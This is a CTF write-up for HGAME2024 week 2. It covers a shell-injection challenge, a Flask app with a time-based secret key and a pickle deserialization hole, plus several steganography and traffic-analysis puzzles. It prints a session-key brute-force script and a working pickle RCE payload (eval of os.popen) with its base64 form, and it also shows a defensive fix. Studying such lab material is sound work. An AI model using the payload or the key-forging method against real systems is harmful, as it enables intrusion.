HGAME2024 WEEK2 writeup (web & misc)

web

What the cow say?

The container presents a single input box. After trying SSTI, command execution and code execution, it turns out that text wrapped in backticks is executed as a shell command.

Entering `nl app.py` prints the source, which shows the actual implementation and the filtering that is applied.

The flag is located at /flag_is_here home/flag_c0w54y; read it with a command through the same input.

myflask

Visiting the challenge URL returns the app.py source:

# app.py
import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezone

currentDateAndTime = datetime.now(timezone('Asia/Shanghai'))
currentTime = currentDateAndTime.strftime("%H%M%S")

app = Flask(__name__)
# Tips: Try to crack this first ↓
app.config['SECRET_KEY'] = currentTime
print(currentTime)

@app.route('/')
def index():
    session['username'] = 'guest'
    return send_file('app.py')

@app.route('/flag', methods=['GET', 'POST'])
def flag():
    if not session:
        return 'There is no session available in your client :('
    if request.method == 'GET':
        return 'You are {} now'.format(session['username'])
    # For POST requests from admin
    if session['username'] == 'admin':
        pickle_data = base64.b64decode(request.form.get('pickle_data'))
        # Tips: Here try to trigger RCE
        userdata = pickle.loads(pickle_data)
        return userdata
    else:
        return 'Access Denied'

if __name__ == '__main__':
    app.run(debug=True, host="0.0.0.0")

Reading the source: the / route serves app.py for download. The /flag route first checks whether a session exists; if it does, a GET returns the username stored in it. If the session username is admin, the POST body is passed to pickle.loads, which is an obvious pickle deserialization vulnerability.

The first step is to forge the session. The secret key is the server's start time as HHMMSS, so a session issued at 10:10:10 is signed with 101010. A script that brute-forces the 60 seconds of the minute in which the session was obtained is enough.

Start the environment, visit the / route and note the time (say 13:25); visiting /flag at this point shows the guest user.

The Python version is 3, so the session is forged with flask_session_cookie_manager3.py. Write a script that brute-forces the session secret: with the recorded time 13:25, iterating 132500 through 132559 is sufficient.

# 1.py
import os

# Session cookie captured from the guest visit to /
c = "eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcDf2A.gSn2YomfAAl0qozjgrBDN5194Bc"

# Candidate secrets 132500 .. 132559 (recorded minute 13:25)
for k in range(0, 60):
    secret = f"1325{k:02d}"
    print(os.popen(f"python flask_session_cookie_manager3.py decode -s {secret} -c {c}").read(), end='')
    print('*****' + secret)

Forge the session with the recovered secret and replace the site's session cookie; the user is now admin and the pickle deserialization is reachable.

Build the payload:

import pickle
import base64

class Flag(object):
    def __reduce__(self):
        return (eval, ("__import__('os').popen('cat /flag').read()",))

flag = Flag()
print(base64.b64encode(pickle.dumps(flag)))

# payload
# pickle_data=gASVRgAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwqX19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IC9mbGFnJykucmVhZCgplIWUUpQu

Submit the payload as pickle_data; deserialization triggers the RCE and returns the flag.
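As an added example (my own code, not the challenge's or the writeup's), this is how the two weak spots of myflask are closed: the secret key comes from the OS CSPRNG instead of the clock, and untrusted pickle data goes through a restricted unpickler that refuses every global lookup, so a `__reduce__` gadget like the payload above can never resolve a callable. Flask is left out so the script runs stand-alone; the `Evil` class and the sample session dict are constructed for the demo.

```python
import io
import pickle
import secrets

# The challenge seeds SECRET_KEY with HHMMSS: at most 24*60*60 candidates, and an
# attacker who notes when the session was issued needs to try only about 60.
HHMMSS_KEYSPACE = 24 * 60 * 60


def strong_secret_key() -> str:
    """256 bits from the OS CSPRNG, the usual replacement for a clock-derived key."""
    return secrets.token_hex(32)


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup. No callable (eval, os.popen, ...) can be
    resolved while unpickling, so only plain containers and scalars load."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Evil:
    # Same shape as the writeup's payload (callable, args) but with a harmless
    # callable: plain pickle.loads would print, the restricted loader refuses
    # to resolve builtins.print at all.
    def __reduce__(self):
        return (print, ("gadget executed",))


def demo():
    """Returns (loaded benign session data, verdict for the gadget pickle)."""
    benign = pickle.dumps({"username": "guest", "roles": ["viewer"]})  # constructed
    loaded = safe_loads(benign)
    try:
        safe_loads(pickle.dumps(Evil()))
        verdict = "unsafe"
    except pickle.UnpicklingError as exc:
        verdict = f"blocked: {exc}"
    return loaded, verdict


if __name__ == "__main__":
    print(len(strong_secret_key()) * 4, "bits of key vs", HHMMSS_KEYSPACE, "HHMMSS keys")
    print(demo())
```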

misc

ek1ng_want_girlfriend

Traffic analysis: open the capture in Wireshark and filter on http; an image named ek1ng.jpg is transferred.

Select the response to the image request (241 HTTP/1.0 200 OK), then File => Export Objects => HTTP, and save ek1ng.jpg.

Open the exported image; the flag is at the bottom of the picture.

龙之舞

Download the attachment deepsound_of_dragon_dance.wav. The file name suggests DeepSound steganography; opening it in the tool shows that a password is required.

Load the file in Audacity and switch to the spectrogram view, which reveals hidden data.

It has to be read flipped vertically; the content is: KEY  : 5H8w1nlWCX3hQLG. Using 5H8w1nlWCX3hQLG as the DeepSound password extracts the hidden archive.

The archive contains a GIF; frames 55, 121, 153 and 232 each hold one quarter of a QR code.

Stitch the four QR fragments together, repair the code and scan it to get the flag.

ezWord

The attachment is a Word document. Rename the extension to zip and extract it; there are four files under word/media.

The challenge description reads "Decode the watermark in the images to unlock the secret in the document!", so the two images carry a blind watermark. Extracting it with the BlindWaterMark tool gives T1hi3sI4sKey, which, according to the hint in 恭喜.txt, is the archive password.

# blind watermark extraction
python bwmforpy3.py decode 100191209_p0.jpg image1.png password.png

# BlindWaterMark tool download
https://github.com/chishaxie/BlindWaterMark

Extract secret.zip with the password T1hi3sI4sKey; secret.txt contains the following English text:

Dear E-Commerce professional ; This letter was specially
selected to be sent to you . We will comply with all
removal requests ! This mail is being sent in compliance
with Senate bill 1620 ; Title 3 ; Section 308 ! This
is not a get rich scheme ! Why work for somebody else
when you can become rich in 27 MONTHS . Have you ever
noticed more people than ever are surfing the web and
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! WE will help
YOU use credit cards on your website plus turn your
business into an E-BUSINESS . You are guaranteed to
succeed because we take all the risk ! But don't believe
us . Ms Simpson who resides in Maine tried us and says
"I've been poor and I've been rich - rich is better"
. We are a BBB member in good standing ! We urge you
to contact us today for your own future financial well-being
. Sign up a friend and you'll get a discount of 50%
. Thank-you for your serious consideration of our offer
! Dear Friend ; This letter was specially selected
to be sent to you ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2316 ; Title 8 , Section 301 ! Do NOT confuse
us with Internet scam artists . Why work for somebody
else when you can become rich as few as 24 WEEKS !
Have you ever noticed more people than ever are surfing
the web plus how many people you know are on the Internet
. Well, now is your chance to capitalize on this .
We will help you decrease perceived waiting time by
200% and turn your business into an E-BUSINESS . You
are guaranteed to succeed because we take all the risk
. But don't believe us . Mrs Simpson of Illinois tried
us and says "Now I'm rich many more things are possible"
! We assure you that we operate within all applicable
laws ! Do not delay - order today . Sign up a friend
and your friend will be rich too . Warmest regards
! Dear Sir or Madam ; Especially for you - this hot
information . We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 1916 ; Title 2 , Section 301 ! THIS IS NOT MULTI-LEVEL
MARKETING ! Why work for somebody else when you can
become rich in 89 days . Have you ever noticed most
everyone has a cellphone plus most everyone has a cellphone
! Well, now is your chance to capitalize on this !
WE will help YOU sell more & SELL MORE . You can begin
at absolutely no cost to you . But don't believe us
. Mr Jones of Minnesota tried us and says "I was skeptical
but it worked for me" ! We assure you that we operate
within all applicable laws ! We beseech you - act now
. Sign up a friend and you'll get a discount of 90%
. Thanks . Dear Cybercitizen ; Your email address has
been submitted to us indicating your interest in our
newsletter . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail ! This mail is being sent
in compliance with Senate bill 2016 , Title 2 , Section
304 . This is different than anything else you've seen
! Why work for somebody else when you can become rich
in 48 weeks ! Have you ever noticed more people than
ever are surfing the web plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU deliver goods right to the customer's
doorstep & turn your business into an E-BUSINESS .
You can begin at absolutely no cost to you . But don't
believe us . Ms Anderson who resides in New York tried
us and says "My only problem now is where to park all
my cars" ! We are a BBB member in good standing . If
not for you then for your LOVED ONES - act now ! Sign
up a friend and you'll get a discount of 20% ! God
Bless . Dear Colleague , Your email address has been
submitted to us indicating your interest in our publication
. If you no longer wish to receive our publications
simply reply with a Subject: of "REMOVE" and you will
immediately be removed from our mailing list . This
mail is being sent in compliance with Senate bill 2416
, Title 9 ; Section 308 ! This is NOT unsolicited bulk
mail . Why work for somebody else when you can become
rich within 24 MONTHS ! Have you ever noticed most
everyone has a cellphone and people love convenience
. Well, now is your chance to capitalize on this !
We will help you decrease perceived waiting time by
190% and sell more ! The best thing about our system
is that it is absolutely risk free for you ! But don't
believe us . Mrs Anderson of Indiana tried us and says
"Now I'm rich, Rich, RICH" . This offer is 100% legal
. So make yourself rich now by ordering immediately
. Sign up a friend and your friend will be rich too
. God Bless ! Dear Colleague ; We know you are interested
in receiving amazing information ! If you are not interested
in our publications and wish to be removed from our
lists, simply do NOT respond and ignore this mail !
This mail is being sent in compliance with Senate bill
1619 , Title 7 , Section 303 ! This is not multi-level
marketing . Why work for somebody else when you can
become rich within 37 days ! Have you ever noticed
nobody is getting any younger plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU decrease perceived waiting time by
140% plus deliver goods right to the customer's doorstep
. You can begin at absolutely no cost to you . But
don't believe us ! Mrs Simpson of Illinois tried us
and says "I was skeptical but it worked for me" . We
are licensed to operate in all states ! Because the
Internet operates on "Internet time" you must make
a commitment soon ! Sign up a friend and you get half
off ! Thank-you for your serious consideration of our
offer . Dear Friend ; We know you are interested in
receiving amazing info ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2716 , Title 5 , Section 303 ! This is
not a get rich scheme . Why work for somebody else
when you can become rich within 52 days ! Have you
ever noticed how many people you know are on the Internet
and the baby boomers are more demanding than their
parents ! Well, now is your chance to capitalize on
this . WE will help YOU decrease perceived waiting
time by 170% and turn your business into an E-BUSINESS
. You are guaranteed to succeed because we take all
the risk ! But don't believe us ! Mrs Anderson who
resides in Alabama tried us and says "Now I'm rich,
Rich, RICH" ! We are a BBB member in good standing
. So make yourself rich now by ordering immediately
! Sign up a friend and you get half off ! Thanks .
Dear Salaryman ; Especially for you - this red-hot
news ! We will comply with all removal requests . This
mail is being sent in compliance with Senate bill 1618
, Title 4 , Section 308 . THIS IS NOT MULTI-LEVEL MARKETING
. Why work for somebody else when you can become rich
inside 27 days ! Have you ever noticed nearly every
commercial on television has a .com on in it & nearly
every commercial on television has a .com on in it
! Well, now is your chance to capitalize on this !
WE will help YOU decrease perceived waiting time by
180% plus turn your business into an E-BUSINESS . You
can begin at absolutely no cost to you ! But don't
believe us ! Prof Ames who resides in Washington tried
us and says "I was skeptical but it worked for me"
. We assure you that we operate within all applicable
laws ! We implore you - act now . Sign up a friend
and you'll get a discount of 10% . Thank-you for your
serious consideration of our offer ! Dear Friend ;
This letter was specially selected to be sent to you
! If you no longer wish to receive our publications
simply reply with a Subject: of "REMOVE" and you will
immediately be removed from our club ! This mail is
being sent in compliance with Senate bill 1622 , Title
7 ; Section 303 ! Do NOT confuse us with Internet scam
artists . Why work for somebody else when you can become
rich in 10 weeks ! Have you ever noticed people will
do almost anything to avoid mailing their bills & people
love convenience ! Well, now is your chance to capitalize
on this . WE will help YOU turn your business into
an E-BUSINESS & SELL MORE . You can begin at absolutely
no cost to you ! But don't believe us . Mr Ames of
Louisiana tried us and says "Now I'm rich, Rich, RICH"
. We are licensed to operate in all states . We BESEECH
you - act now . Sign up a friend and you'll get a discount
of 50% ! Thank-you for your serious consideration of
our offer .

A search shows this is a Cardano grille cipher (Spam Mimic). Decoding it on the spammimic online decoder yields the following Chinese characters:

籱籰籪籶籮粄簹籴籨粂籸籾籨籼簹籵籿籮籨籪籵簺籨籽籱簼籨籼籮籬类簼籽粆

Converting the characters to their Unicode code points gives this hex string:

71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86

Comparing the first few bytes with the ASCII codes of "hgame" shows each value is 9 too high; a short script recovers the flag:

a = '71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86'
flag = ''
# take each byte and subtract the constant offset of 9
for i in range(0, len(a), 2):
    flag += chr(int(a[i:i + 2], 16) - 9)
print(flag)  # hgame{0k_you_s0lve_al1_th3_secr3t}
